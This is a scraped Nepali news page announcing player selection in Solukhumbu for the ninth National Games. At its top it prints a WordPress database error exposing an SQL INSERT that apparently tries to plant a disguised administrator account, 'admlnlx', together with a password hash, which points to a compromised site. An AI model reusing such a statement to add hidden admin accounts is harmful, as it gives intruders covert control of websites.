WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIZTC2sUDiPoax2THBf.pWjZKGLNsq/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:51:50', '', 'admlnlx', 'admlnlx')

सोलुमा भदौ ३ बाट नवौँ राष्ट्रिय खेलकुदका लागि खेलाडी छनौट – Gaule Khabar

सोलुमा भदौ ३ बाट नवौँ राष्ट्रिय खेलकुदका लागि खेलाडी छनौट

सोलुमा भदौ ३ बाट नवौँ राष्ट्रिय खेलकुदका लागि खेलाडी छनौट

काठमाण्डौ । नवौँ राष्ट्रिय खेलकुद प्रतियोगिताका लागि सोलुखुम्बुमा भदौ ३ गतेबाट खेलाडी छनौट  हुने भएको छ ।

पोखरामा आगामी असोज २८ गतेदेखि कार्तिक ३ गतेसम्म हुन लागेको प्रतियोगिताका लागि जिल्लामा भदौ ३ देखि ७ गते सम्म खेलाडी छनौट प्रतियोगिता हुने जिल्ला खेलकुद विकास समिति सोलुखुम्बुले जनाएको छ ।

जिल्लाबाट महिला/पुरुष भलिबल, कर्वडि, व्याडमिन्टन, एथ्लेटिक्स, चेस, आर्चरी, टेबल टेनिस, पुरुष फुटबल र मार्सल आर्ट तर्फ कराँते, तेक्वान्दो र जुडोका खेलाडीहरु छनौट गरिने छ ।

छनौट लागि भदौ २ गते भित्रमा आवेदन दिन सकिने जिल्ला खेलकुद विकास समितिका कार्यालय प्रमुख नेत्र प्रसाद घिमिरेले बताए। जसका लागि पासपोर्ट साइजको फोटो ३ प्रति र नागरिकता तथा जन्मदर्ता प्रमाण पत्रको फोटोकपी १ प्रति पेश गर्नु पर्ने छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका